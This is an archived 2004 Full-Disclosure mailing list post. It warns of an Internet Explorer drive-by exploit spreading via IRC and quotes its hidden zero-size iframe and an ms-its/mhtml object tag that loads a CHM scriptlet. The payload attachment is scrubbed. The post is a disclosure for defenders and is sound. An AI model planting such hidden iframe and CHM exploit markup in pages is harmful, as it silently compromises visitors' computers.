[Full-Disclosure] IE exploit going around on irc
Niek Baakman
niekbaakman at home.nl
Mon Apr 5 18:52:21 BST 2004
Hi list,
this thing's been going around on irc the last few days:
www.divx.dc-hub.com (IE users don't click it!)
check source:
<iframe src='loi.htm' width=0 height=0></iframe>
loi.htm contains:
<object
data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
type="text/x-scriptlet"></object>
LOI.CHM is attached
Regards,
Niek Baakman
--
The greatest trick the devil ever pulled was convincing the world he didn't exist.
PGP KeyID: 0x65C28B9A | Fingerprint: 7A5301026E58CF3FACE7F2F0D82B854565C28B9A
-------------- next part --------------
A non-text attachment was scrubbed...
Name: LOI.zip
Type: application/octet-stream
Size: 6422 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040405/7a2072af/attachment.obj
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 187 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040405/7a2072af/attachment.bin
Full-Disclosure is hosted and sponsored by Secunia.